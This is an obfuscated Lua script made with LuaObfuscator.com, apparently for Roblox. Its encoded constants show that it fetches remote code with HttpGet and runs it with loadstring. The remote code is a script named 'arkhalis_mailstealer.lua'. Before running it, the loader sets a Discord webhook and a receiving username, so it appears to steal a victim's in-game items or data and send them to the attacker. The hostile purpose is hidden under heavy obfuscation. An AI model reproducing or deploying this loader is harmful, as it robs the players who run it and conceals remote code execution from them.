
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v83,v19);v19=nil;v96=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%(2^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v84-(v84%(620 -(555 + 64))) ;else local v85=931 -(857 + (1711 -(1523 + 114))) ;local v86;while true do if (v85==(568 -(367 + 201))) then v86=(929 -(193 + 21 + 713))^(v32-(1 + 0)) ;return (((v31%(v86 + v86))>=v86) and 1) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==((87 + 30) -((127 -95) + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;v37=958 -(892 + 65) ;end if (v37==(2 -1)) then return (v41 * 16777216) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end end end local function v24()local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(7 -4)) then if (v47==(1486 -(998 + 488))) then if (v46==(1913 -(1789 + 124))) then return v48 * (0 -0) ;else local v98=(766 -(745 + 21)) + 0 ;while true do if (v98==(772 -(70 + 131 + 571))) then v47=998 -(915 + 82) ;v45=0 -(0 -0) ;break;end end end elseif (v47==(1193 + 854)) then return ((v46==(0 -0)) and (v48 * ((1188 -(1069 + 118))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3734 -(10633 -7922)) ) * (v45 + (v46/((3 -1)^(184 -132)))) ;end if (v42==(1 + 0)) then v45=(1 + 0) -0 ;v46=(v20(v44,2 -1 ,2 + 18 ) * ((2 + 0)^(823 -(368 + 423)))) + v43 ;v42=6 -4 ;end if (v42==2) then v47=v20(v44,39 -(8 + 2 + 8) ,119 -88 );v48=((v20(v44,(1163 -(87 + 968)) -76 )==(443 -(416 + 26))) and  -(3 -(8 -6))) or (1 + 0) ;v42=2 + 1 ;end if (v42==(0 -(0 + 0))) then v43=v23();v44=v23();v42=(3951 -2203) -(760 + 987) ;end end end local function v25(v49)local v50=1413 -(447 + 966) ;local v51;local v52;while true do if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -(1818 -(1703 + 114)) );v18=v18 + v49 ;v50=703 -(376 + 325) ;end if (v50==(4 -1)) then return v6(v52);end if (v50==(5 -3)) then v52={};for v90=1 + 0 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=(1271 -(243 + 1022)) -3 ;end if (v50==((53 -39) -(9 + 5))) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=(312 + 65) -(85 + 291) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v66=0 -0 ;local v67;while true do if (0==v66) then v67=0 -0 ;while true do if (v67==1) then if (v53==(1636 -(1373 + 263))) then local v123=1000 -(451 + 549) ;while true do if (v123==(1 + 1)) then v53=1 -0 ;break;end if (v123==(1 -0)) then v56={};v57={v54,v55,nil,v56};v123=343 -(218 + 123) ;end if (v123==0) then v54={};v55={};v123=1;end end end break;end if ((1581 -(1535 + 46))==v67) then local v99=0 + 0 ;while true do if (v99~=(0 + 0)) then else if (v53==2) then for v147=561 -(306 + 254) ,v23() do local v148=0 + 0 ;local v149;local v150;while true do if (v148==1) then while true do if (0==v149) then v150=v21();if (v20(v150,1,1 -0 )==0) then local v172=1467 -(899 + 568) ;local v173;local v174;local v175;local v176;while true do if (v172==(2 + 0)) then while true do if ((2 -1)~=v173) then else local v184=0;while true do if (v184==(603 -(268 + 335))) then v176={v22(),v22(),nil,nil};if (v174==0) then local v196=0;local v197;local v198;while true do if (v196==(1456 -(282 + 1174))) then v197=811 -(569 + 242) ;v198=nil;v196=1;end if (v196==(2 -1)) then while true do if (v197==0) then v198=0 + 0 ;while true do if (0==v198) then v176[3]=v22();v176[4]=v22();break;end end break;end end break;end end elseif (v174==1) then v176[3]=v23();elseif (v174==2) then v176[1027 -(706 + 318) ]=v23() -(2^(1267 -(721 + 530))) ;elseif (v174==3) then local v202=0;local v203;local v204;while true do if (v202==(1271 -(945 + 326))) then v203=0;v204=nil;v202=2 -1 ;end if (v202~=1) then else while true do if (v203==(0 + 0)) then v204=700 -(271 + 429) ;while true do if (v204==(0 + 0)) then v176[3]=v23() -((1502 -(1408 + 92))^(1102 -(461 + 625))) ;v176[1292 -(993 + 295) ]=v22();break;end end break;end end break;end end end v184=1 + 0 ;end if (v184==(1172 -(418 + 753))) then v173=1 + 1 ;break;end end end if ((1 + 1)~=v173) then else if (v20(v175,1,1)~=1) then else v176[1 + 1 ]=v59[v176[1 + 1 ]];end if (v20(v175,2,2)==(530 -(406 + 123))) then v176[3]=v59[v176[1772 -(1749 + 20) ]];end v173=1 + 2 ;end if (v173==(1322 -(1249 + 73))) then local v185=0;while true do if (v185==(1 + 0)) then v173=1146 -(466 + 679) ;break;end if (v185~=0) then else v174=v20(v150,2,6 -3 );v175=v20(v150,4,6);v185=1;end end end if (v173==3) then if (v20(v175,3,8 -5 )==1) then v176[4]=v59[v176[4]];end v54[v147]=v176;break;end end break;end if (v172==0) then v173=0;v174=nil;v172=1901 -(106 + 1794) ;end if ((1 + 0)==v172) then v175=nil;v176=nil;v172=1 + 1 ;end end end break;end end break;end if (v148~=(0 -0)) then else v149=0;v150=nil;v148=1;end end end for v151=1,v23() do v55[v151-(2 -1) ]=v28();end return v57;end if (v53~=(115 -(4 + 110))) then else local v142=0;local v143;while true do if ((584 -(57 + 527))==v142) then v143=0;while true do if (v143~=2) then else v53=1429 -(41 + 1386) ;break;end if ((104 -(17 + 86))~=v143) then else local v170=0 + 0 ;while true do if (v170==0) then for v178=1 -0 ,v58 do local v179=0 -0 ;local v180;local v181;local v182;while true do if ((166 -(122 + 44))~=v179) then else local v183=0;while true do if ((1 -0)~=v183) then else v179=1;break;end if (v183~=0) then else v180=0;v181=nil;v183=3 -2 ;end end end if (v179==(1 + 0)) then v182=nil;while true do if (v180==(0 + 0)) then local v187=0 -0 ;local v188;while true do if (v187==(65 -(30 + 35))) then v188=0;while true do if (v188~=0) then else local v200=0 + 0 ;while true do if (v200~=0) then else v181=v21();v182=nil;v200=1;end if (v200~=1) then else v188=1;break;end end end if (v188==1) then v180=1;break;end end break;end end end if (v180==1) then if (v181==1) then v182=v21()~=0 ;elseif (v181==(1259 -(1043 + 214))) then v182=v24();elseif (v181~=3) then else v182=v25();end v59[v178]=v182;break;end end break;end end end v57[3]=v21();v170=3 -2 ;end if (v170==(1213 -(323 + 889))) then v143=5 -3 ;break;end end end if ((580 -(361 + 219))~=v143) then else local v171=320 -(53 + 267) ;while true do if (v171==(0 + 0)) then v58=v23();v59={};v171=1;end if (v171~=(414 -(15 + 398))) then else v143=983 -(18 + 964) ;break;end end end end break;end end end v99=1;end if (v99==(3 -2)) then v67=1 + 0 ;break;end end end end break;end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=5) then if (v81<=2) then if (v81<=0) then local v100=0;local v101;local v102;local v103;local v104;while true do if (v100==2) then for v144=v101,v73 do local v145=0;while true do if (v145==0) then v104=v104 + 1 ;v78[v144]=v102[v104];break;end end end break;end if (v100==1) then v73=(v103 + v101) -1 ;v104=0;v100=2;end if (v100==0) then v101=v80[2];v102,v103=v71(v78[v101](v13(v78,v101 + 1 ,v80[3])));v100=1;end end elseif (v81==1) then do return;end else local v127=0;while true do if (v127==0) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v127=1;end if (v127==4) then v72=v80[3];break;end if (v127==2) then v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v127=3;end if (v127==1) then v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v127=2;end if (v127==3) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v127=4;end end end elseif (v81<=3) then local v105;local v106,v107;local v108;local v109;v78[v80[2]][v80[3]]=v80[4];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v109=v80[2];v108=v78[v80[3]];v78[v109 + 1 ]=v108;v78[v109]=v108[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v109=v80[2];v106,v107=v71(v78[v109](v13(v78,v109 + 1 ,v80[3])));v73=(v107 + v109) -1 ;v105=0;for v124=v109,v73 do v105=v105 + 1 ;v78[v124]=v106[v105];end v72=v72 + 1 ;v80=v68[v72];v109=v80[2];v78[v109]=v78[v109](v13(v78,v109 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81>4) then v78[v80[2]]=v80[3];else local v130=0;local v131;while true do if (v130==0) then v131=v80[2];v78[v131]=v78[v131](v13(v78,v131 + 1 ,v73));break;end end end elseif (v81<=8) then if (v81<=6) then v78[v80[2]][v80[3]]=v80[4];elseif (v81==7) then v72=v80[3];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=10) then if (v81==9) then local v134=v80[2];local v135=v78[v80[3]];v78[v134 + 1 ]=v135;v78[v134]=v135[v80[4]];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==11) then v78[v80[2]]();else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03423O00682O7470733A2O2F646973636F72642E636F6D2F6368612O6E656C732F38353437383637343235312O3032363735322F38353437383637343331352O363034392O36030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D6531030E3O0067616D65725F6B6E69677468313403093O00557365726E616D6532035O00173O0012053O00013O00260A3O000E000100020004073O000E000100120C000100033O00300300010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O0016000100260A3O0001000100010004073O0001000100120C000100033O0030020001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00013O00017O00",v9(),...);end
